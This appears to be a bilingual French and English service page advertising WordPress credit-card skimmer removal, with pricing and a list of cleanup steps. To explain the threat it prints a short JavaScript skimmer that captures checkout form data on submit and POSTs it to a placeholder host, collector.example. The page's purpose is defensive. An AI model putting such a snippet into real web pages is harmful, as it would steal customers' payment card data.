PHARMA HACK · WORDPRESS · NETTOYÉ
WordPress credit card skimmer removal.
Manual removal of the card skimmer. I find the entry point and write a report your acquirer can read. Flat $279.
MÉCANISME
Quelques lignes de JavaScript suffisent à voler chaque commande.
Un skimmer de carte est un minuscule JavaScript qui écoute votre formulaire de paiement. Dès qu’un client saisit son numéro, le skimmer en fait une copie et l’envoie à une adresse contrôlée par l’attaquant — souvent un serveur d’apparence inoffensive.
La page fonctionne toujours. La commande passe toujours. Ni le client ni vous ne voyez rien d’anormal. Nous reproduisons la commande dans un bac à sable, traçons le script jusqu’à son emplacement réel sur votre site et le supprimons sans casser le reste du paiement.
01 document.querySelector('form.checkout').addEventListener('submit', function (e) { 02 const data = new FormData(e.target); 03 fetch('https://collector.example/c', { 04 method: 'POST', body: data, mode: 'no-cors' 05 }); 06 }); 07 08 // A fetch to an external host on form submit is the signature.
What I remove
Chaque endroit où cette infection se cache.
-
TRIAGE DES PLUGINS
Nous passons une commande de test en bac à sable et surveillons chaque appel réseau du checkout.
-
JAVASCRIPT
Fichiers de thème, ressources d’extensions et scripts inline examinés. Tout ce qui envoie des données de formulaire hors domaine — retiré.
-
BASE DE DONNÉES
Scripts injectés dans wp_options, wp_posts et widgets actifs — supprimés. La persistance est cassée.
-
SERVICES
Portes dérobées PHP qui réinstallent le skimmer traquées. Tâches cron et must-use plugins vérifiés.
-
CHRONOLOGIE
Dates de première et dernière observation établies pour savoir quelles commandes ont été exposées.
-
RAPPORT
Rapport forensique en clair, adapté aux clients, assureurs ou archives.
Tarifs
Cleanup
$279
flat, one-time, per site
Manual cleanup, entry-vector identification, written forensic report.
Démarrer un nettoyageMonitoring
$29 / mo
per site, cancel any time
Surveillance continue, durcissement, un nettoyage par an inclus.
Se protégerPart of threatover's broader security practice. Penetration testing, bug bounty consulting, triage, and security advisory.
Voir tous les services →E-mail [email protected] or use the contact form.